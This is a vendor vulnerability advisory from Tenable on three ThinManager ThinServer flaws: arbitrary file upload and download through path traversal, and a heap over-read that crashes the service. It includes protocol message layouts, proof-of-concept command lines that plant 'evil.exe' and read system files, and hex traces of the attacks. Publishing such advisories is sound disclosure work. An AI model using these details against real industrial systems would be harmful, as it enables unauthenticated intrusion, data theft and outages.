Synopsis
There are multiple vulnerabilities in Rockwell Automation ThinManager ThinServer.exe.
Affected Versions:
- 6.x - 10.x
- 11.0.0 - 11.0.5
- 11.1.0 - 11.1.5
- 11.2.0 - 11.2.6
- 12.0.0 - 12.0.4
- 12.1.0 - 12.1.5
- 13.0.0 - 13.0.1
CVE-2023-27855 - ThinManager ThinServer Path Traversal Upload
(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)A client message sent to a synchronization thread in ThinServer.exe has the following structure:
// be = big endian
struct header
{
be16 type; // msg type
be16 flags; // msg flags
// 0x0001 - request
// 0x0002 - response
// 0x8000 - ?
be32 len; // msg body length
};
struct msg
{
header hdr;
byte data[hdr.len]; // format depends on hdr.type
};
struct msg_7_35
{
header hdr; // hdr.type must be 7 or 35
be32 unk;
string file_name; // null-terminated string
string file_type;
string unk;
string unk; // present only in msg 35
be32 flen // number of bytes in the fdata field
byte fdata[flen] // data to write to file_name
};
A path traversal exists (via the file_name field) when processing a message of type 7 or 35 (SYNC_MSG_SEND_FILE). An unauthenticated remote attacker can exploit this to upload arbitrary files to any directory on the disk drive where ThinServer.exe is installed. The attacker can overwrite existing executable files with attacker-controlled, malicious contents, potentially causing remote code execution.
POC:
A Proof of Concept exploit for this vulnerability was created by Tenable Research. Below is example output for PoC execution against a vulnerable target.Example output:
# echo -n 'malicious file contents' > /tmp/malicious_file_contents # python3 thinserver_path_traversal_file_upload.py -t-f /tmp/malicious_file_contents -n '\Program Files\Rockwell Software\ThinManager\evil.exe' [-- req --] 00000000: 00 01 00 00 .... [-- res --] 00000000: 00 04 00 01 00 00 00 08 00 00 28 93 54 6B BB 3F ..........(.Tk.? Uploading local file /tmp/malicious_file_contents as \Program Files\Rockwell Software\ThinManager\evil.exe on the remote host. Please check if the file has been uploaded.
CVE-2023-27856 - ThinManager ThinServer Path Traversal Download
(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)Message 8 sent by the client has the following the structure:
struct msg_8
{
header hdr; // hdr.type must be 8
be32 unk;
string file_name; // null-terminated string
};
A path traversal exists (via the file_name field) when processing a message of type 8. An unauthenticated remote attacker can exploit this to download arbitrary files on the disk drive where ThinServer.exe is installed.
POC:
A Proof of Concept exploit for this vulnerability was created by Tenable Research. Below is example output for PoC execution against a vulnerable target.Example output:
# python3 thinserver_path_traversal_file_download.py -t-f '\Windows\win.ini' [-- req --] 00000000: 00 01 00 00 .... [-- res --] 00000000: 00 04 00 01 00 00 00 08 00 00 50 68 2F A1 BF 3F ..........Ph/..? [-- req --] 00000000: 00 08 00 01 00 00 00 30 00 00 00 AA 2E 2E 5C 2E .......0......\. 00000010: 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E .\..\..\..\..\.. 00000020: 5C 2E 2E 5C 2E 2E 5C 5C 57 69 6E 64 6F 77 73 5C \..\..\\Windows\ 00000030: 77 69 6E 2E 69 6E 69 00 win.ini. [-- res (up to 4096 bytes) --] 00000000: 00 08 00 02 00 00 00 64 00 00 00 AA 00 00 00 5C .......d.......\ 00000010: 3B 20 66 6F 72 20 31 36 2D 62 69 74 20 61 70 70 ; for 16-bit app 00000020: 20 73 75 70 70 6F 72 74 0D 0A 5B 66 6F 6E 74 73 support..[fonts 00000030: 5D 0D 0A 5B 65 78 74 65 6E 73 69 6F 6E 73 5D 0D ]..[extensions]. 00000040: 0A 5B 6D 63 69 20 65 78 74 65 6E 73 69 6F 6E 73 .[mci extensions 00000050: 5D 0D 0A 5B 66 69 6C 65 73 5D 0D 0A 5B 4D 61 69 ]..[files]..[Mai 00000060: 6C 5D 0D 0A 4D 41 50 49 3D 31 0D 0A l]..MAPI=1..
CVE-2023-27857 - ThinManager ThinServer Heap-Based Buffer Overflow
(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)A heap-based buffer over-read condition occurs when the msg_7_35.flen field indicates more data than present in the msg_7_35.fdata field. An unauthenticated remote attacker can exploit this vulnerability to:
- Create a large number of tmp files in C:\ProgramData\Rockwell Software\ThinManager\tmp\
- Cause memory contents after the fdata field to be written to the tmp files, which can be downloaded by exploiting vulnerability 2)
- Crash ThinServer.exe due to read access violation.
POC:
A Proof of Concept exploit for this vulnerability was created by Tenable Research. Below is example output for PoC execution against a vulnerable target.Example output:
# python3 thinserver_sendfile_dos.py -tConnection 1 Connection 2 Connection 3 Connection 4 Traceback (most recent call last): File "/work/0day/thinserver_sendfile_dos.py", line 33, in s.connect((target, port)) ConnectionRefusedError: [Errno 111] Connection refused
After restarting ThinServer.exe
# python3 thinserver_path_traversal_file_download.py -t-f '\ProgramData\Rockwell Software\ThinManager\tmp\tmpinstallfile_0' [-- req --] 00000000: 00 01 00 00 .... [-- res --] 00000000: 00 04 00 01 00 00 00 08 00 00 00 BE 84 F6 62 3F ..............b? [-- req --] 00000000: 00 08 00 01 00 00 00 5F 00 00 00 AA 2E 2E 5C 2E ......._......\. 00000010: 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E 5C 2E 2E .\..\..\..\..\.. 00000020: 5C 2E 2E 5C 2E 2E 5C 5C 50 72 6F 67 72 61 6D 44 \..\..\\ProgramD 00000030: 61 74 61 5C 52 6F 63 6B 77 65 6C 6C 20 53 6F 66 ata\Rockwell Sof 00000040: 74 77 61 72 65 5C 54 68 69 6E 4D 61 6E 61 67 65 tware\ThinManage 00000050: 72 5C 74 6D 70 5C 74 6D 70 69 6E 73 74 61 6C 6C r\tmp\tmpinstall 00000060: 66 69 6C 65 5F 30 00 file_0. [-- res (up to 4096 bytes) --] 00000000: 00 08 00 02 00 05 D0 08 00 00 00 AA 00 05 D0 00 ................ 00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00000020: 00 00 00 78 35 9C A0 F9 7F 00 00 D0 F1 92 A0 F9 ...x5........... 00000030: 7F 00 00 10 8F A2 02 00 00 00 00 01 00 00 00 00 ................ 00000040: 00 00 00 01 00 00 00 00 00 00 00 10 00 00 00 00 ................ 00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060: 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000070: 00 00 00 FC C3 08 0F 00 1E 00 80 5C 00 3F 00 3F ...........\.?.? 00000080: 00 5C 00 43 00 3A 00 5C 00 50 00 72 00 6F 00 67 .\.C.:.\.P.r.o.g 00000090: 00 72 00 61 00 6D 00 44 00 61 00 74 00 61 00 5C .r.a.m.D.a.t.a.\ 000000A0: 00 52 00 6F 00 63 00 6B 00 77 00 65 00 6C 00 6C .R.o.c.k.w.e.l.l 000000B0: 00 20 00 53 00 6F 00 66 00 74 00 77 00 61 00 72 . .S.o.f.t.w.a.r 000000C0: 00 65 00 5C 00 54 00 68 00 69 00 6E 00 4D 00 61 .e.\.T.h.i.n.M.a 000000D0: 00 6E 00 61 00 67 00 65 00 72 00 5C 00 54 00 4D .n.a.g.e.r.\.T.M 000000E0: 00 48 00 69 00 73 00 74 00 6F 00 72 00 79 00 2E .H.i.s.t.o.r.y.. 000000F0: 00 64 00 62 00 2D 00 6A 00 6F 00 75 00 72 00 6E .d.b.-.j.o.u.r.n 00000100: 00 61 00 6C 00 00 00 00 00 00 00 00 00 00 00 00 .a.l............ 00000110: 00 00 00 86 C3 02 0F F9 1F 00 90 00 00 00 00 00 ................ ...snip...>
Solution
Update to a supported fixed version according to the vendor advisory.Additional References
https://rockwellautomation.custhelp.com/app/answers/answer_view/a_id/1138640https://www.cisa.gov/news-events/ics-advisories/icsa-23-080-06
Disclosure Timeline
12/16/2022 - Disclosed Issue to Vendor
03/15/2023 - Vendor asked and was granted 6 day disclosure extension.
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team